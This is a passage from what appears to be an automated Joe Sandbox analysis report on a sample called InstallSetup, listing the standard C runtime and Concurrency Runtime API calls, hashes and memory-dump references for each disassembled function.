                                                                                                  • Part of subcall function 00958687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009586A8
                                                                                                  • Part of subcall function 00958687: Hash.LIBCMT ref: 009586E8
                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00962BD8
                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00962BF8
                                                                                                  • Part of subcall function 0095F6DF: Hash.LIBCMT ref: 0095F6F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                • String ID:
                                                                                                • API String ID: 2250070497-0
                                                                                                • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                • Instruction ID: 03ee0beec513a142b84d7f9bcc11388b72cba662d5658f61f0aa3558ba285231
                                                                                                • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                • Instruction Fuzzy Hash: 4F012976800604ABC714DF65C882EDAF7E8FF99320F008A1EE55A97551DB70F944CB60
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 009450D1
                                                                                                  • Part of subcall function 0094BDAE: __EH_prolog3_GS.LIBCMT ref: 0094BDB5
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 0094511C
                                                                                                • __Getcoll.LIBCPMT ref: 0094512B
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0094513B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID:
                                                                                                • API String ID: 1836011271-0
                                                                                                • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                • Instruction ID: 87241bcddf05a63c0f13cdd2a9e6011441864e596ec978a078e697673e2bd80c
                                                                                                • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                • Instruction Fuzzy Hash: 7F019AB1D15709EFDB00EFA4C481FACB7B4BF98312F108029E055AB282CBB49944CB95
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00945B8D
                                                                                                  • Part of subcall function 0094BDAE: __EH_prolog3_GS.LIBCMT ref: 0094BDB5
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00945BD8
                                                                                                • __Getcoll.LIBCPMT ref: 00945BE7
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00945BF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID:
                                                                                                • API String ID: 1836011271-0
                                                                                                • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                • Instruction ID: 671f352f06152316cd7ae47ff7d118de36ca567898cc96c42e1095a99f2c0301
                                                                                                • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                • Instruction Fuzzy Hash: FE015E71D11709DFDF00EFA4C485F9DB7B4BF94316F108029E4556B282DBB49944CB95
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                  • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                • __Getcoll.LIBCPMT ref: 00405980
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID:
                                                                                                • API String ID: 1836011271-0
                                                                                                • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                APIs
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C170
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C180
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C190
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C1A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                • String ID:
                                                                                                • API String ID: 3973403980-0
                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction ID: 9f74fd6263af2c5ee027ac568af316a03c3cc79fdd3fc45dcd69313b11066a63
                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction Fuzzy Hash: A501C9BA408749BFDF12DE96DC029AD3B6AAF45352F148411FD1884072D732CAB8ABC1
                                                                                                APIs
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                • String ID:
                                                                                                • API String ID: 3973403980-0
                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                APIs
                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00951342
                                                                                                  • Part of subcall function 00950BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00950BD6
                                                                                                  • Part of subcall function 00950BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00950BF7
                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00951355
                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00951361
                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0095136A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                • String ID:
                                                                                                • API String ID: 4284812201-0
                                                                                                • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                • Instruction ID: 76569c68a497605f4939feb0bc61114eac195026ed98c4de83c658ddcc694f6d
                                                                                                • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                • Instruction Fuzzy Hash: 24F02430600305A7CF14FBB60862B7D31A66FC1311F040079BD119F3C1CE749D0893A4
                                                                                                APIs
                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0095378C
                                                                                                  • Part of subcall function 00952B16: ___crtGetTimeFormatEx.LIBCMT ref: 00952B2C
                                                                                                  • Part of subcall function 00952B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00952B4B
                                                                                                • GetLastError.KERNEL32 ref: 009537A8
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009537BE
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009537CC
                                                                                                  • Part of subcall function 009528EC: SetThreadPriority.KERNEL32(?,?), ref: 009528F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                • String ID:
                                                                                                • API String ID: 1674182817-0
                                                                                                • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                • Instruction ID: 9da3a13accd1078667e33772b935c28e0eb458fce7af7d7cfe0e9fa4d37d07ee
                                                                                                • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                • Instruction Fuzzy Hash: 81F0A7B2A002153AD720F7769C0BFBB369C9B42752F504926BD15E7082FD98D40883B4
                                                                                                APIs
                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                  • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                  • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                • String ID:
                                                                                                • API String ID: 4284812201-0
                                                                                                • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                APIs
                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                  • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                  • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                • GetLastError.KERNEL32 ref: 00413541
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                  • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                • String ID:
                                                                                                • API String ID: 1674182817-0
                                                                                                • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0095D088
                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0095D0AC
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0095D0BF
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0095D0CD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID:
                                                                                                • API String ID: 3657713681-0
                                                                                                • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                • Instruction ID: 3c3c759a67ac8fa7bb9ee392105576dfd6c5cd6f26728ae50e6493a617844032
                                                                                                • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                • Instruction Fuzzy Hash: 54F05935501204A3C734FB32D842E6EB37D8ED0716B60852AEC05172C2DF71A90EC751
                                                                                                APIs
                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0095286F
                                                                                                • GetLastError.KERNEL32(?,?,?,?,00958830,?,?,?,?,00000000,?,00000000), ref: 0095287E
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952894
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009528A2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                • String ID:
                                                                                                • API String ID: 3803302727-0
                                                                                                • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                • Instruction ID: df9d5a06fc5eb0ac1777b48a62a1b5ca353223826e96d88fca8fb879b67e8570
                                                                                                • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                • Instruction Fuzzy Hash: 3BF0A03450010ABBCF10EFE5CD46FAF37BC6B01702F600610BA10E20A1DB35DA089764
                                                                                                APIs
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 00945A83
                                                                                                • __Cnd_signal.LIBCPMT ref: 00945A8F
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 00945AA4
                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00945AAB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                • String ID:
                                                                                                • API String ID: 2059591211-0
                                                                                                • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                • Instruction ID: 1dfeaabc9b2444ac47e2e18b1539d39ba9d6b224b98d2c198aad1881819b1f68
                                                                                                • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                • Instruction Fuzzy Hash: 2CF05531000701AFEB20BB70DC07F1A73A0AF81328F14892DF045568A2DF7AEC548655
                                                                                                APIs
                                                                                                • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                • String ID:
                                                                                                • API String ID: 3803302727-0
                                                                                                • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                APIs
                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 00952593
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00950DA0), ref: 009525A1
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009525B7
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009525C5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                • String ID:
                                                                                                • API String ID: 200240550-0
                                                                                                • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                • Instruction ID: 0c9b304f4b9687079fda4bb9ddbd6c92872159fda7533f5d3c86f9e8cf1943a3
                                                                                                • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                • Instruction Fuzzy Hash: 5EE0D86160021529E710F7754C07F7F369C5B01B42F840951BD14E10C3FE94D50842A4
                                                                                                APIs
                                                                                                • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                • String ID:
                                                                                                • API String ID: 200240550-0
                                                                                                • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                APIs
                                                                                                  • Part of subcall function 00952959: TlsAlloc.KERNEL32(?,00950DA0), ref: 0095295F
                                                                                                • TlsAlloc.KERNEL32(?,00950DA0), ref: 00963BE6
                                                                                                • GetLastError.KERNEL32 ref: 00963BF8
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00963C0E
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00963C1C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3735082963-0
                                                                                                • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                • Instruction ID: a0c32ddd00d793c4cac87abaa57484166e7eaaf0201afef933ac8f41ea1ac739
                                                                                                • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                • Instruction Fuzzy Hash: 91E0D874500206AFC310FB769C9BB7E76686A41742B504E26F925D31E2EE39D20D4B6C
                                                                                                APIs
                                                                                                  • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                • GetLastError.KERNEL32 ref: 00423991
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3735082963-0
                                                                                                • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                APIs
                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00950DA0), ref: 0095279E
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00950DA0), ref: 009527AD
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009527C3
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009527D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3016159387-0
                                                                                                • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                • Instruction ID: 42613e011fe0ae11cac6dd6b2eb1944bc4357fec2b4ae56097dbc74f28884f1f
                                                                                                • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                • Instruction Fuzzy Hash: 3DE0867460010AA7CB10FBB6DD4AFAF73BC6A41B02B600565B911E3151EB68EB0C8779
                                                                                                APIs
                                                                                                • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3016159387-0
                                                                                                • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                APIs
                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 009528F8
                                                                                                • GetLastError.KERNEL32 ref: 00952904
